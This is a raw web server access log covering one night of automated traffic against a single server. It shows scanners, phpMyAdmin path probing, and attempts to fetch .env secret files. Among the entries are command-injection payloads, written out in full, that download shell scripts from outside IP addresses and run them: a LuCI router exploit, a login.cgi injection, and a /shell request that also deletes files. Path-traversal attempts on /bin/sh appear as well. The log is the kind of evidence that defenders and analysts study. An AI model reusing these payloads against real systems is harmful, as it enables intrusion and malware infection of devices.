141.164.58.230 - - [02/Oct/2024:00:46:26 +0200] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:27 +0200] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:27 +0200] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:28 +0200] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:29 +0200] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:29 +0200] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:30 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:30 +0200] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
141.164.58.230 - - [02/Oct/2024:00:46:31 +0200] "GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
95.214.55.43 - - [02/Oct/2024:00:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.158.205.47 - - [02/Oct/2024:00:48:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
95.214.55.138 - - [02/Oct/2024:00:49:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Oct/2024:00:51:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.215 - - [02/Oct/2024:00:53:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.215 - - [02/Oct/2024:00:53:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [02/Oct/2024:00:55:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.133.93 - - [02/Oct/2024:00:59:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [02/Oct/2024:01:03:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [02/Oct/2024:01:04:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.117.241.82 - - [02/Oct/2024:01:06:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:01:07:19 +0200] "" 501 315 "-" "-"
3.10.235.38 - - [02/Oct/2024:01:07:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.43 - - [02/Oct/2024:01:09:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.117.241.82 - - [02/Oct/2024:01:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.67 - - [02/Oct/2024:01:12:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.67 - - [02/Oct/2024:01:12:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [02/Oct/2024:01:13:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [02/Oct/2024:01:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.146.48 - - [02/Oct/2024:01:15:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.48 - - [02/Oct/2024:01:15:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:01:15:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:01:15:07 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
3.10.235.38 - - [02/Oct/2024:01:16:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
95.214.55.138 - - [02/Oct/2024:01:17:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.67 - - [02/Oct/2024:01:18:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.55.138 - - [02/Oct/2024:01:19:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.67 - - [02/Oct/2024:01:19:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.67 - - [02/Oct/2024:01:20:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
3.10.235.38 - - [02/Oct/2024:01:20:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [02/Oct/2024:01:21:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.235.38 - - [02/Oct/2024:01:23:50 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.224.128.67 - - [02/Oct/2024:01:24:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.67 - - [02/Oct/2024:01:24:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
205.210.31.87 - - [02/Oct/2024:01:25:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.87 - - [02/Oct/2024:01:25:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.224.128.67 - - [02/Oct/2024:01:25:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
3.10.235.38 - - [02/Oct/2024:01:28:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.43 - - [02/Oct/2024:01:30:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [02/Oct/2024:01:31:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.235.38 - - [02/Oct/2024:01:32:21 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
95.214.55.138 - - [02/Oct/2024:01:34:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Oct/2024:01:34:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [02/Oct/2024:01:34:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.235.38 - - [02/Oct/2024:01:36:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.117.241.82 - - [02/Oct/2024:01:37:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Oct/2024:01:39:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.240 - - [02/Oct/2024:01:39:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.240 - - [02/Oct/2024:01:39:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [02/Oct/2024:01:44:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:01:44:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.224.128.67 - - [02/Oct/2024:01:45:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
147.185.132.15 - - [02/Oct/2024:01:45:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.15 - - [02/Oct/2024:01:45:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.117.241.82 - - [02/Oct/2024:01:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:01:48:20 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
149.50.103.48 - - [02/Oct/2024:01:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.210.239 - - [02/Oct/2024:01:51:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [02/Oct/2024:01:52:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [02/Oct/2024:01:54:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.139.5.66 - - [02/Oct/2024:01:56:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
3.10.235.38 - - [02/Oct/2024:01:56:47 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
149.50.103.48 - - [02/Oct/2024:01:57:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:02:00:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [02/Oct/2024:02:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:02:08:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [02/Oct/2024:02:08:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Oct/2024:02:10:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.117.241.82 - - [02/Oct/2024:02:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.10.235.38 - - [02/Oct/2024:02:16:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [02/Oct/2024:02:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Oct/2024:02:20:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.239 - - [02/Oct/2024:02:22:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.239 - - [02/Oct/2024:02:22:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.235.38 - - [02/Oct/2024:02:24:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.187 - - [02/Oct/2024:02:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.211.139.188 - - [02/Oct/2024:02:26:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.118.52.46 - - [02/Oct/2024:02:27:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
34.38.48.249 - - [02/Oct/2024:02:27:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
35.195.157.58 - - [02/Oct/2024:02:27:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
34.38.48.249 - - [02/Oct/2024:02:28:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
3.10.235.38 - - [02/Oct/2024:02:28:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
34.77.126.178 - - [02/Oct/2024:02:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
178.211.139.188 - - [02/Oct/2024:02:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.77.139.124 - - [02/Oct/2024:02:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
34.77.139.124 - - [02/Oct/2024:02:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
178.211.139.188 - - [02/Oct/2024:02:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [02/Oct/2024:02:35:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.190.205.136 - - [02/Oct/2024:02:35:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
35.190.205.136 - - [02/Oct/2024:02:35:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
91.238.181.21 - - [02/Oct/2024:02:36:04 +0200] "\x03" 501 316 "-" "-"
178.211.139.188 - - [02/Oct/2024:02:37:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Oct/2024:02:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.32.197.83 - - [02/Oct/2024:02:38:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
45.156.128.41 - - [02/Oct/2024:02:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
192.250.224.76 - - [02/Oct/2024:02:42:20 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
65.49.1.84 - - [02/Oct/2024:02:43:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.29 - - [02/Oct/2024:02:43:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.156.100 - - [02/Oct/2024:02:43:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
216.218.206.67 - - [02/Oct/2024:02:44:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.32.39.38 - - [02/Oct/2024:02:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
149.50.103.48 - - [02/Oct/2024:02:48:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.223 - - [02/Oct/2024:02:49:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7"
78.153.140.223 - - [02/Oct/2024:02:49:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.223 - - [02/Oct/2024:02:49:45 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
78.153.140.223 - - [02/Oct/2024:02:49:45 +0200] "GET /demo/.env HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62"
78.153.140.223 - - [02/Oct/2024:02:49:45 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 6.0; LG-D851 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36"
35.203.211.197 - - [02/Oct/2024:02:51:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.156.129.54 - - [02/Oct/2024:02:52:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [02/Oct/2024:02:56:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [02/Oct/2024:02:57:21 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
177.223.59.162 - - [02/Oct/2024:02:59:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.71.44 - - [02/Oct/2024:03:04:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
178.211.139.188 - - [02/Oct/2024:03:16:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.250.224.76 - - [02/Oct/2024:03:20:23 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
178.211.139.188 - - [02/Oct/2024:03:26:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.213.187.244 - - [02/Oct/2024:03:28:21 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
178.211.139.188 - - [02/Oct/2024:03:28:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
41.46.82.45 - - [02/Oct/2024:03:28:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+82.165.221.158/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
178.211.139.188 - - [02/Oct/2024:03:38:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.130.34.74 - - [02/Oct/2024:03:38:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
178.211.139.188 - - [02/Oct/2024:03:39:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.211.218 - - [02/Oct/2024:03:59:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
165.154.36.105 - - [02/Oct/2024:04:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2_2) AppleWebKit/584.51 (KHTML, like Gecko) Chrome/88.0.1454 Safari/537.36"
165.154.36.105 - - [02/Oct/2024:04:07:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.36.105 - - [02/Oct/2024:04:07:52 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.36.105 - - [02/Oct/2024:04:07:52 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
141.98.11.15 - - [02/Oct/2024:04:19:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.15 - - [02/Oct/2024:04:24:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.104.11.4 - - [02/Oct/2024:04:27:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.58 - - [02/Oct/2024:04:32:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.15 - - [02/Oct/2024:04:32:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.15 - - [02/Oct/2024:04:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.139 - - [02/Oct/2024:04:38:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.139 - - [02/Oct/2024:04:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [02/Oct/2024:04:38:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "More Safari 2.0 user agents strings -->>"
78.153.140.177 - - [02/Oct/2024:04:38:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [02/Oct/2024:04:38:54 +0200] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
78.153.140.177 - - [02/Oct/2024:04:38:54 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34"
78.153.140.177 - - [02/Oct/2024:04:38:54 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
78.153.140.177 - - [02/Oct/2024:04:38:55 +0200] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:47.0) Gecko/20100101 Firefox/47.0"
78.153.140.177 - - [02/Oct/2024:04:38:55 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)"
